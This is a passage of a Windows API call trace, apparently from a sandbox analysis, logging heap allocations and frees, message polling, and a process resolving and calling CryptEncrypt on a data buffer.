lpMem=0x24aa968 | out: hHeap=0x25c0000) returned 1 [0254.647] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16c8 | out: hHeap=0x25c0000) returned 1 [0254.647] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16c8 | out: hHeap=0x25c0000) returned 1 [0254.647] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b4870 | out: hHeap=0x25c0000) returned 1 [0254.647] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16c8 | out: hHeap=0x25c0000) returned 1 [0254.647] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16c8 | out: hHeap=0x25c0000) returned 1 [0254.647] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1868 | out: hHeap=0x25c0000) returned 1 [0254.647] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa008 | out: hHeap=0x25c0000) returned 1 [0254.647] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e70 | out: hHeap=0x25c0000) returned 1 [0254.647] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa080 | out: hHeap=0x25c0000) returned 1 [0254.648] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16c8 | out: hHeap=0x25c0000) returned 1 [0254.648] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16c8 | out: hHeap=0x25c0000) returned 1 [0254.648] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1868 | out: hHeap=0x25c0000) returned 1 [0254.648] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa110 | out: hHeap=0x25c0000) returned 1 [0254.648] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f48 | out: hHeap=0x25c0000) returned 1 [0254.648] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d68 | out: hHeap=0x25c0000) returned 1 [0254.648] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16c8 | out: hHeap=0x25c0000) returned 1 [0254.648] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16c8 | out: hHeap=0x25c0000) returned 1 [0254.648] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1868 | out: hHeap=0x25c0000) returned 1 [0254.648] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24d1270 | out: hHeap=0x25c0000) returned 1 [0254.648] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c08 | out: hHeap=0x25c0000) returned 1 [0254.648] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ea0 | out: hHeap=0x25c0000) returned 1 [0254.648] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ee8 | out: hHeap=0x25c0000) returned 1 [0254.648] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16c8 | out: hHeap=0x25c0000) returned 1 [0254.648] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16c8 | out: hHeap=0x25c0000) returned 1 [0254.649] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d930 | out: hHeap=0x25c0000) returned 1 [0254.649] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c08 | out: hHeap=0x25c0000) returned 1 [0254.649] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a95b8 | out: hHeap=0x25c0000) returned 1 [0254.649] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1e8 | out: hHeap=0x25c0000) returned 1 [0254.649] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9b40 | out: hHeap=0x25c0000) returned 1 [0254.649] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16c8 | out: hHeap=0x25c0000) returned 1 [0254.649] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0254.649] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1e8 | out: hHeap=0x25c0000) returned 1 [0254.649] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c08 | out: hHeap=0x25c0000) returned 1 [0254.649] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a95b8 | out: hHeap=0x25c0000) returned 1 [0254.649] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1868 | out: hHeap=0x25c0000) returned 1 [0254.649] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1e8 | out: hHeap=0x25c0000) returned 1 [0254.649] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c08 | out: hHeap=0x25c0000) returned 1 [0254.649] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c18 | out: hHeap=0x25c0000) returned 1 [0254.649] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1888 | out: hHeap=0x25c0000) returned 1 [0254.649] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c18 | out: hHeap=0x25c0000) returned 1 [0254.649] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c08 | out: hHeap=0x25c0000) returned 1 [0254.650] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1e8 | out: hHeap=0x25c0000) returned 1 [0254.650] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1858 | out: hHeap=0x25c0000) returned 1 [0254.650] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1e8 | out: hHeap=0x25c0000) returned 1 [0254.650] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c08 | out: hHeap=0x25c0000) returned 1 [0254.650] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c18 | out: hHeap=0x25c0000) returned 1 [0254.650] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ba8 | out: hHeap=0x25c0000) returned 1 [0254.650] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c18 | out: hHeap=0x25c0000) returned 1 [0254.650] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c08 | out: hHeap=0x25c0000) returned 1 [0254.650] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1e8 | out: hHeap=0x25c0000) returned 1 [0254.650] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17b8 | out: hHeap=0x25c0000) returned 1 [0254.650] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a95b8 | out: hHeap=0x25c0000) returned 1 [0254.650] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a95b8 | out: hHeap=0x25c0000) returned 1 [0254.650] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c08 | out: hHeap=0x25c0000) returned 1 [0254.650] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1e8 | out: hHeap=0x25c0000) returned 1 [0254.650] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c38 | out: hHeap=0x25c0000) returned 1 [0254.650] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1e8 | out: hHeap=0x25c0000) returned 1 [0254.650] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c08 | out: hHeap=0x25c0000) returned 1 [0254.651] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a95b8 | out: hHeap=0x25c0000) returned 1 [0254.651] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1798 | out: hHeap=0x25c0000) returned 1 [0254.651] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a95b8 | out: hHeap=0x25c0000) returned 1 [0254.651] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c08 | out: hHeap=0x25c0000) returned 1 [0254.651] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1e8 | out: hHeap=0x25c0000) returned 1 [0254.651] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1948 | out: hHeap=0x25c0000) returned 1 [0254.651] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0254.651] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x24a95b8, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptEncrypt", lpUsedDefaultChar=0x0) returned 13 [0254.651] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a95b8 | out: hHeap=0x25c0000) returned 1 [0254.651] GetProcAddress (hModule=0x74d40000, lpProcName="CryptEncrypt") returned 0x74d6779b [0254.651] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1e8 | out: hHeap=0x25c0000) returned 1 [0254.651] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1948 | out: hHeap=0x25c0000) returned 1 [0254.651] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1948 | out: hHeap=0x25c0000) returned 1 [0254.651] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c08 | out: hHeap=0x25c0000) returned 1 [0254.652] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2415a48 | out: hHeap=0x25c0000) returned 1 [0254.652] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2415a18 | out: hHeap=0x25c0000) returned 1 [0254.652] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2412248 | out: hHeap=0x25c0000) returned 1 [0254.652] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x249bb10 | out: hHeap=0x25c0000) returned 1 [0254.652] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2060 | out: hHeap=0x25c0000) returned 1 [0254.652] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3c40 | out: hHeap=0x25c0000) returned 1 [0254.652] CryptEncrypt (in: hKey=0xaa5860, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x8bef68*=0x4c04, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x8bef68*=0x4c08) returned 1 [0254.652] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x214) returned 0x34a0288 [0254.652] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3c40 [0254.652] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x249bb10 [0254.652] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1e8 [0254.652] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a95b8 [0254.652] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c18 [0254.652] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c08 [0254.652] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c18 | out: hHeap=0x25c0000) returned 1 [0254.652] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c08 | out: hHeap=0x25c0000) returned 1 [0254.652] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a95b8 | out: hHeap=0x25c0000) returned 1 [0254.652] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a95b8 [0254.652] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c18 [0254.653] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9de0 [0254.653] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c08 [0254.653] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9de0 | out: hHeap=0x25c0000) returned 1 [0254.653] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c08 | out: hHeap=0x25c0000) returned 1 [0254.653] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c18 | out: hHeap=0x25c0000) returned 1 [0254.653] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c18 [0254.653] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9de0 [0254.653] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa878 [0254.653] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c08 [0254.653] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa878 | out: hHeap=0x25c0000) returned 1 [0254.653] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c08 | out: hHeap=0x25c0000) returned 1 [0254.653] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9de0 | out: hHeap=0x25c0000) returned 1 [0254.653] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9de0 [0254.653] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa878 [0254.653] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d20 [0254.653] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c08 [0254.653] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d20 | out: hHeap=0x25c0000) returned 1 [0254.653] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c08 | out: hHeap=0x25c0000) returned 1 [0254.653] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa878 | out: hHeap=0x25c0000) returned 1 [0254.653] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa878 [0254.654] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d20 [0254.654] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f60 [0254.654] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c08 [0254.654] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f60 | out: hHeap=0x25c0000) returned 1 [0254.654] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c08 | out: hHeap=0x25c0000) returned 1 [0254.654] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d20 | out: hHeap=0x25c0000) returned 1 [0254.654] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d20 [0254.654] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f60 [0254.654] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9708 [0254.654] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c08 [0254.654] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9708 | out: hHeap=0x25c0000) returned 1 [0254.654] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c08 | out: hHeap=0x25c0000) returned 1 [0254.654] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f60 | out: hHeap=0x25c0000) returned 1 [0254.654] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f60 [0254.654] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9708 [0254.654] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa278 [0254.654] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c08 [0254.654] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa278 | out: hHeap=0x25c0000) returned 1 [0254.654] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c08 | out: hHeap=0x25c0000) returned 1 [0254.655] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9708 | out: hHeap=0x25c0000) returned 1 [0254.655] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9708 [0254.655] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa278 [0254.655] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa7e8 [0254.655] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c08 [0254.655] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa7e8 | out: hHeap=0x25c0000) returned 1 [0254.655] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c08 | out: hHeap=0x25c0000) returned 1 [0254.655] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa278 | out: hHeap=0x25c0000) returned 1 [0254.655] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0254.655] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18f8 [0254.655] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1788 [0254.655] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16c8 [0254.655] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466dd0 [0254.655] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1798 [0254.655] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa038 [0254.656] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ca8 [0254.656] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c38 [0254.656] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c48 [0254.656] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0254.656] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0254.656] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18f8 [0254.656] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1788 [0254.656] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa038 [0254.656] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ca8 [0254.656] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16c8 [0254.656] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c48 [0254.656] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0254.656] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18a8 [0254.656] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9fc0 [0254.656] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ac9f0 [0254.656] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18f8 [0254.656] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa038 [0254.656] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1788 [0254.656] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466dd0 [0254.656] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ca8 [0254.656] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c48 [0254.656] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b16c8 [0254.656] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1798 [0254.656] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b4870 [0254.657] CharLowerBuffW (in: lpsz="byte[19464]", cchLength=0xb | out: lpsz="byte[19464]") returned 0xb [0254.657] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x24) returned 0x249f1a0 [0254.657] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ca8 [0254.657] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1788 [0254.657] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c48 [0254.657] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b16c8 [0254.657] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ee8 [0254.657] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c38 [0254.657] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ea0 [0254.657] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b17b8 [0254.657] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0254.657] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ca8 [0254.657] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e58 [0254.657] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1788 [0254.657] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x14) returned 0x2466dd0 [0254.657] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x24) returned 0x249f1a0 [0254.657] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9fc0 [0254.657] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18a8 [0254.658] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0254.658] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1788 [0254.658] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ca8 [0254.658] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa038 [0254.658] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1798 [0254.658] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b4870 [0254.658] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18a8 [0254.658] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0254.658] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0254.658] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18a8 [0254.658] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18f8 [0254.658] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e58 [0254.658] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9fc0 [0254.658] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c38 [0254.658] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c48 [0254.658] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0254.658] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0254.658] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0254.658] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18a8 [0254.658] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18f8 [0254.658] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e58 [0254.658] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9fc0 [0254.658] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c38 [0254.659] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c48 [0254.659] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0254.659] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1d0 [0254.659] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18f8 [0254.659] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c38 [0254.659] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e40 [0254.659] CryptEncrypt (in: hKey=0xaa5860, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x24d1270*, pdwDataLen=0x8bef68*=0x4c04, dwBufLen=0x4c08 | out: pbData=0x24d1270*, pdwDataLen=0x8bef68*=0x4c08) returned 1 [0254.659] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x214) returned 0x34a0288 [0254.659] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6440 [0254.659] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18f8 [0254.659] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1d0 [0254.659] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e40 [0254.659] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9648 [0254.660] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1948 [0254.660] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0254.660] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x249bb10 [0254.660] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x2415a48 [0254.660] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x2415a18 